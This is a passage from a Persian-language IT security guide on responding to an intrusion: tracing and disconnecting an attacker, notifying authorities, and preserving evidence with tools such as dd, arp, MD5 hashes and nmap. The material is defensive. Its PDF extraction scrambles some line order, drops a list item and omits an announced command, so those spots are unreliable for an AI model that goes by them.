ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺯﻣﺎﻧﺒﻨﺪﻱ ﺷﻤﺎ ﺭﺩ ﭘﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ .ﻫﻤﻴﻦ ﻧﻜﺘﺔ ﺳﺎﺩﻩ ،ﻳﻚ ﺍﺻﻞ ﺩﺭ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺳـﺖ :ﻫﻤـﻮﺍﺭﻩ
ﺳﻌﻲ ﻛﻨﻴﺪ ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﺑﺎﺷﻴﺪ.
ﻭﺻﻞ ﺑﺎﺷﺪ ،ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻳﺠﺎﺩ ﻣﺰﺍﺣﻤﺖ ،ﺗﻤﺎﻡ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻭ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻮﺩﻡ ﻳﺎ ﭘﻮﺭﺕ ﺳﺮﻳﺎﻝ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻣﺘﺼﻞ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺘﻌـﺪﺩ ﺩﻳﮕـﺮﻱ
ﺑــﺮﺍﻱ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﻭﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﻧــﺪ ،ﻣﺜــﻞ rtty ،conserver ،ttywatchﻭ .ser2netﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﺑــﻪ ﻃــﻮﺭ ﺩﻗﻴــﻖ ﻭ
ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﻮﺭﺕ ﺳﺮﻳﺎﻝ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﺣﺘـﻲ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ pseudo-ttyﻫﺎ ﻫﻢ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳـﺖ ﻛـﻪ ﻣﻬـﺎﺟﻢ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺎﻧﻨﺪ SSHﻭ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﺩﺭ ﺑﺮﺧﻲ ﻛﺸﻮﺭﻫﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﺪ ،ﻳﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺗﻲ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷـﺪ ﻛـﻪ ﺩﺭ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﺍﺯ ﻃـﺮﻑ
ﺷﺮﻛﺖ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﮔﻔﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ.
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺍﺗﺼﺎﻻﺕ ﺭﺍ ﺭﺩﮔﻴﺮﻱ ﻭ ﻣﻬﺎﺟﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺎ ﺗﻠﻔﻦ ﺑﺎ ﺷﻤﺎ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﻣـﺴﺌﻠﻪ .٤
ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﺑﺮﺧﻲ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻳـﺎ ﺭﺩ ﻭﻱ ﺭﺍ
ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﺩﺳﺘﻮﺭ whoﻳﺎ netstatﺳـﺮﻳﻌﹰﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺭﺍﻳﺎﻧـﺔ ﺳﺮﭼـﺸﻤﻪ ﺍﻳـﻦ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٣٤
ﺍﺗﺼﺎﻝ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ .ﺳﭙﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺭﺍﻫﺒﺮ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﺑﻴﺸﺘﺮ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ )ﺍﻟﺒﺘـﻪ ﺣﺘﻤـﹰﺎ ﺑـﺎ ﺗﻠﻔـﻦ!(؛ ﺍﻃﻼﻋـﺎﺕ
ﻻ ﺩﺭ ﺍﻃﻼﻋﺎﺕ whoisﻧﺎﻡ ﺩﺍﻣﻨﻪ ﻳﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﮔﺰﻳﻨـﺔ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮ ﹰ
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺩﮔﻴﺮﻱ ﻣﺴﻴﺮ ﺍﺳﺖ )ﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻧﺎﻡ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ tracerouteﻳﺎ tracertﺑﺎﺷﺪ( .ﺍﮔﺮ ﺗﻤﺎﻡ ﺍﻳﻦ
ﺭﺍﻫﻬﺎ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻛﺎﺭﺑﺮ rootﻳﺎ postmasterﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﺒﺪﺃ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ
ﺑﺨﻮﺍﻫﻴﺪ ﺑﺎ ﺷﻤﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻧﻔﻮﺫ ﺣﺮﻓﻲ ﻧﺰﻧﻴﺪ ،ﭼﻮﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ
ﻧﻴﺰ ﺗﺤﺖ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺑﺎ ﺧﺎﺗﻤﺔ ﭘﺮﺩﺍﺯﻩ ،ﻗﻄﻊ ﻣﻮﺩﻡ ﻳﺎ ﺷﺒﻜﻪ ،ﻭ ﻳﺎ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪ ،ﺍﺗﺼﺎﻝ ﻣﻬﺎﺟﻢ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ .ﻗﻄﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧـﻪ ﺳـﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺵ .٥
ﺑﺮﺍﻱ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮ ﻋﻤﻞ ﺩﻳﮕﺮ -ﺍﺯ ﺟﻤﻠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺑﻴﺸﺘﺮ -ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺍﻳﻦ ﻋﻤﻞ
ﺑﺴﻴﺎﺭ ﺧﺸﻦ ﺍﺳﺖ ،ﭼﻮﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺟﻠﻮﻱ ﻣﻬﺎﺟﻢ ﺭﺍ ﻣﻲﮔﻴﺮﺩ ،ﻛﺎﺭ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺸﺮﻭﻉ ﺭﺍ ﻧﻴﺰ ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻣﻲﻛﻨـﺪ.
ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﻛﻪ ﺭﻭﺯﻱ ﺩﺭ ﺩﺍﺩﮔﺎﻩ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ )ﻣﺎﻧﻨﺪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ( ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﺩ ،ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺗﺮﺍﻭﺍﻫﺎﻳﻲ ﻛﻪ
ﻱ ﻣﺠـﺪﺩ ،ﺻـﺪﻣﺎﺗﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﺩ .ﺑﻌـﻼﻭﻩ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻗﺮﺍﺭﺩﺍﺩﻩ ﺷﺪﻩ ،ﺩﺭ ﺯﻣﺎﻥ ﺭﺍﻩﺍﻧﺪﺍﺯ ﹺ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻨﺪ ﻗﻄﻊ ﻧﺎﮔﻬﺎﻧﻲ ﺑﺮﻕ ﺭﺍ ﺗﺤﻤﻞ ﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺸﻴﺪﻥ ﺩﻭﺷﺎﺧﻪ ﺻﺪﻣﺎﺗﻲ ﺑﻴﺶ ﺍﺯ
ﺁﻧﭽﻪ ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺁﻭﺭﺩ.
ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ psﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻭ ﭘـﺲ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻭ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﻌﻮﻳﺾ ﻛﺮﺩﻳـﺪ ،ﺑـﺎ ﺩﺳـﺘﻮﺭ killﺁﻥ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺭﺍ ﺧﺎﺗﻤـﻪ ﺩﻫﻴـﺪ .ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
Task Manager ،Windowsﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ.
ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺑﺮﺍﻱ ﺩﻭﺭ ﺭﻳﺨﺘﻦ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻥ
ﻼ ﺑﺎ ﻛﺸﻴﺪﻥ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﺗﺼﺎﻝ ﻭﻱ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺷﻤﺎﺭﺓ ﺷـﻤﺎ ﺭﺍ ﮔﺮﻓﺘـﻪ ﺑﺎﺷـﺪ ﺍﻭ ﺁﻣﺪﻩ ،ﻳﺎ ﻛ ﹰ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻮﺩﻡ ﺭﺍ ﺧﺎﻣﻮﺵ ﻛﻨﻴﺪ ﻳﺎ ﺳﻴﻢ ﺁﻧﺮﺍ ﺍﺯ ﭘﺸﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻴﺮﻭﻥ ﺑﻜﺸﻴﺪ.
ﺑﺎ ISPﺧﻮﺩ ،ﻳﻚ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ ،ﻳﺎ ﻳﻚ ﻣﺴﺌﻮﻝ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺭﺍ ﺑﻪ ﺍﻃﻼﻉ ﺁﻧﺎﻥ ﺑﺮﺳﺎﻧﻴﺪ. .٦
ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ
ﺍﺩﺍﻣﺔ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻓﺼﻞ ﺍﺧﺘﺼﺎﺹ ﺑﻪ ﺍﻳﻦ ﺩﺍﺭﺩ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺗﺮﻣﻴﻢ ﻭ ﺗﻤﻴﺰﻛﺎﺭﻱ ﺷﻮﻧﺪ.
ﺣﻔﻆ ﻣﺪﺍﺭﻙ
ﻝ ﺑﺮ ﻭﻗﻮﻉ ﺟـﺮﻡ ﺩﺍﺭﻳـﺪ .ﺣﺘـﻲ ﺍﮔـﺮ
ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ( ،ﻧﻴﺎﺯ ﺑﻪ ﻣﺪﺍﺭﻛﻲ ﺩﺍ ﹼ
ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﻫﻴﭽﮕﻮﻧﻪ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﺪﺍﺭﻳﺪ ،ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺑﺎﺯﺳﺎﺯﻱ ﺁﻧﭽﻪ ﮐﻪ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﮐﻤﮏ ﻛﻨﺪ.
ﻼ ﭼﻨﺪ ﺭﻭﺵ ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻔﻴﺪ ﻣﻲﺁﻳﻨﺪ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﺪ.
ﺭﻭﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺫﻳ ﹰ
ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﻴﺴﺘﻢ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻛﻨﻴﺪ .ﺩﺭ Unixﺍﻳﻨﻜﺎﺭ ﺑﺎ ﺩﺳﺘﻮﺭ ddﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ: .١
ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﺯ ﻣﻬﺎﺟﻢ ﺑﻪ ﺟﺎ ﻣﺎﻧﺪﻩ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺍﻳـﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﺩﺭ ﭼﻨـﺪﻳﻦ .٣
ﺭﺍﻳﺎﻧﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ.
ﻓﺎﻳﻠﻬﺎﻱ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻳﺎ ﺩﻳﺴﻚ ﻧﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ. .٤
ﺩﺳﺘﻮﺭ " "arp –aﻳﺎ " "arp –vﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺗﺎ ﻣﺤﺘﻮﻳﺎﺕ ﺟﺪﻭﻝ - ARPﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻴﺎﻧﮕﺮ ﺍﺗﺼﺎﻻﺕ ﺍﺧﻴﺮ ﺷﺒﻜﻪﺍﻱ ﺑﺎﺷـﺪ -ﺭﺍ .٥
ﭘﻴﺶ ﺭﻭﻱ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﻇﺎﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﻤﺎ ﺗﺨﺮﻳـﺐ ﺷـﺪﻩ ،ﺁﻥ ﺻـﻔﺤﺎﺕ HTMLﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﺧـﻮﺩ ﺫﺧﻴـﺮﻩ ﻧﻤﺎﻳﻴـﺪ .ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ .٦
ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺻﻔﺤﺔ ﻧﻤﺎﻳﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﻧﺤﻮﺓ ﻧﻤﺎﻳﺶ ﺁﻥ ﺻﻔﺤﺎﺕ ﺭﻭﻱ ﻧﻤﺎﻳﺸﮕﺮ ﺭﺍ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ.
ﺍﺯ ﺗﺼﺎﻭﻳﺮﻱ ﻛﻪ ﺣﺎﻟﺖ ﺟﺎﺭﻱ ﺳﻴﺴﺘﻢ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎﺯﮔﻮ ﻣﻲﻛﻨﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﻴﺪ .ﺩﺭ ﺑﺮﻧﺎﻣﺔ X Windowﺍﺯ xwdﻭ ﺩﺭ .٧
Microsoft Windowsﺍﺯ ﻛﻠﻴﺪ Print Screenﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٣٦
ﺧﻼﺻﻪﭘﻴﺎﻡ MD5ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮ ﺗﺼﻮﻳﺮ ﻳﺎ ﻓﺎﻳﻠﻲ ﻛﻪ ﺑﺎﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻳـﺪ .ﺍﻳـﻦ MD5ﺭﺍ ﺭﻭﻱ ﻛﺎﻏـﺬ ﭼـﺎﭖ ﻛﻨﻴـﺪ، .٨
ﺍﻣﻀﺎ ﻧﻤﺎﻳﻴﺪ ،ﺗﺎﺭﻳﺦ ﺑﺰﻧﻴﺪ ،ﻭ ﺁﻧﺮﺍ ﺩﺭ ﻛﺘﺎﺑﭽﺔ ﺛﺒﺖ ﻭﻗﺎﻳﻊ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺑﻌﺪﻫﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺍﻳـﻦ MD5ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺗﻐﻴﻴـﺮ
ﻧﻴﺎﻓﺘﻦ ﻣﺪﺍﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻳﻜﺴﺮﻱ ﻣﺤﺼﻮﻻﺕ ﺗﺠﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ،ﻣﺎﻧﻨﺪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺳـﺮﻋﺖ ﺑـﺎﻻ ﺍﺯ
ﺩﻳﺴﻚ ،٣٤٢ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻗﺎﻧﻮﻧﻲ ﺷﺒﻜﻪﺍﻱ ) ٣٤٣(NFATsﻛﻪ ﺗﻤﺎﻡ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ.
ﺍﮔﺮ ﻣﺴﺆﻭﻻﻥ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺭﺍ ﻭﺍﺭﺩ ﻣﺎﺟﺮﺍ ﻛﺮﺩﻩﺍﻳﺪ ،ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﺮﺧﻮﺩ ﺷﺮﻭﻉ ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻛﻨﻴﺪ ،ﺑﺎ ﺁﻧﻬﺎ ﻣﺸﻮﺭﺕ ﻧﻤﺎﻳﻴﺪ.
ﺣﺴﺎﺑﻬﺎﻱ ﺟﺪﻳﺪ
ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ ،ﺑﺪﻧﺒﺎﻝ ﺣﺴﺎﺑﻬﺎﻱ ﺟﺪﻳﺪ ﺑﮕﺮﺩﻳﺪ ﻭ ﻫﺮ ﺣﺴﺎﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﭘﺎﻙ ﻛﻨﻴﺪ .ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﺨﻮﺍﻫﻴـﺪ
ﻗﺒﻞ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ،ﺳﺎﺑﻘﻪﺍﻱ ﻛﺎﻏﺬﻱ ﺍﺯ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻬﺎﺟﻢ ﺭﺍ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ) .ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﻭ ﺭﺍ ﭘﻴـﺪﺍ
ﻛﻨﻴﺪ(.
ﺍﺯ nmapﻳﺎ ﭘﻮﻳﺸﮕﺮ ﭘﻮﺭﺕ ﺩﻳﮕﺮﻱ ﺍﺯ ﻳﻚ ﻣﺎﺷﻴﻦ ﺩﺳﺘﻜﺎﺭﻱﻧﺸﺪﻩ ﺭﻭﻱ ﻫﻤﺎﻥ ﺷﺒﻜﻪ ﺩﺭﻳﺎﺑﻴﺪ) .ﺍﻟﺒﺘـﻪ ﺍﺯ ﻧﻈـﺮ ﺍﻣﻨﻴﺘـﻲ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻨﮕﺎﻣﻴﻜـﻪ
